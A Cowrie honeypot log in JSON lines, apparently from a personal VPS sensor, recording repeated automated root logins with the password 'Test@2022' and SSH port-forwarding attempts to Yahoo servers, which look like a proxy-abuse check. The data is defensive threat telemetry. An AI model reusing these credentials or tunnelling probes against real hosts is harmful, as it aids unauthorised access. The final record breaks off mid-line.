{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.271044Z","src_ip":"213.209.150.239","session":"ba1f6e8674ee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.506893Z","src_ip":"213.209.150.239","session":"ba1f6e8674ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19317,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19317","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.556292Z","session":"ba1f6e8674ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.603669Z","src_ip":"213.209.150.239","session":"ba1f6e8674ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":8622,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8622","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.741725Z","session":"ba1f6e8674ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.789049Z","src_ip":"213.209.150.239","session":"ba1f6e8674ee"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.837149Z","src_ip":"213.209.150.239","session":"ba1f6e8674ee"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25574,"dst_ip":"1.2.3.4","dst_port":22,"session":"002e140e21e4","protocol":"ssh","message":"New connection: 213.209.150.239:25574 (1.2.3.4:22) [session: 002e140e21e4]","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.892726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.898485Z","src_ip":"213.209.150.239","session":"002e140e21e4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:05.949691Z","src_ip":"213.209.150.239","session":"002e140e21e4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.233956Z","src_ip":"213.209.150.239","session":"002e140e21e4"}
{"eventid":"cowrie.session.connect","src_ip":"218.17.175.145","src_port":50098,"dst_ip":"1.2.3.4","dst_port":23,"session":"36566e52cabb","protocol":"telnet","message":"New connection: 218.17.175.145:50098 (1.2.3.4:23) [session: 36566e52cabb]","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.267363Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":29227,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29227","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.291695Z","session":"002e140e21e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.348463Z","src_ip":"213.209.150.239","session":"002e140e21e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":16193,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16193","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.503051Z","session":"002e140e21e4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.559622Z","src_ip":"213.209.150.239","session":"002e140e21e4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.617495Z","src_ip":"213.209.150.239","session":"002e140e21e4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25618,"dst_ip":"1.2.3.4","dst_port":22,"session":"46fdc975a7e2","protocol":"ssh","message":"New connection: 213.209.150.239:25618 (1.2.3.4:22) [session: 46fdc975a7e2]","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.673285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.674441Z","src_ip":"213.209.150.239","session":"46fdc975a7e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:06.731065Z","src_ip":"213.209.150.239","session":"46fdc975a7e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.014197Z","src_ip":"213.209.150.239","session":"46fdc975a7e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":1011,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1011","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.072035Z","session":"46fdc975a7e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.128740Z","src_ip":"213.209.150.239","session":"46fdc975a7e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18659,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18659","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.283165Z","session":"46fdc975a7e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.340073Z","src_ip":"213.209.150.239","session":"46fdc975a7e2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.398109Z","src_ip":"213.209.150.239","session":"46fdc975a7e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25676,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbc1baa89b5e","protocol":"ssh","message":"New connection: 213.209.150.239:25676 (1.2.3.4:22) [session: bbc1baa89b5e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.453881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.455022Z","src_ip":"213.209.150.239","session":"bbc1baa89b5e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.511897Z","src_ip":"213.209.150.239","session":"bbc1baa89b5e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.794290Z","src_ip":"213.209.150.239","session":"bbc1baa89b5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":24059,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:24059","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.852423Z","session":"bbc1baa89b5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:07.909341Z","src_ip":"213.209.150.239","session":"bbc1baa89b5e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17999,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17999","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.063113Z","session":"bbc1baa89b5e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.119756Z","src_ip":"213.209.150.239","session":"bbc1baa89b5e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.177701Z","src_ip":"213.209.150.239","session":"bbc1baa89b5e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25738,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c279f1f224","protocol":"ssh","message":"New connection: 213.209.150.239:25738 (1.2.3.4:22) [session: c2c279f1f224]","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.224006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.224942Z","src_ip":"213.209.150.239","session":"c2c279f1f224"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.272550Z","src_ip":"213.209.150.239","session":"c2c279f1f224"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.508363Z","src_ip":"213.209.150.239","session":"c2c279f1f224"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":4089,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4089","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.556830Z","session":"c2c279f1f224"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.604300Z","src_ip":"213.209.150.239","session":"c2c279f1f224"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24586,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24586","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.742154Z","session":"c2c279f1f224"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.789525Z","src_ip":"213.209.150.239","session":"c2c279f1f224"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.837722Z","src_ip":"213.209.150.239","session":"c2c279f1f224"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":25785,"dst_ip":"1.2.3.4","dst_port":22,"session":"48887f1fdc6d","protocol":"ssh","message":"New connection: 213.209.150.239:25785 (1.2.3.4:22) [session: 48887f1fdc6d]","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.893025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:08.894044Z","src_ip":"213.209.150.239","session":"48887f1fdc6d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256",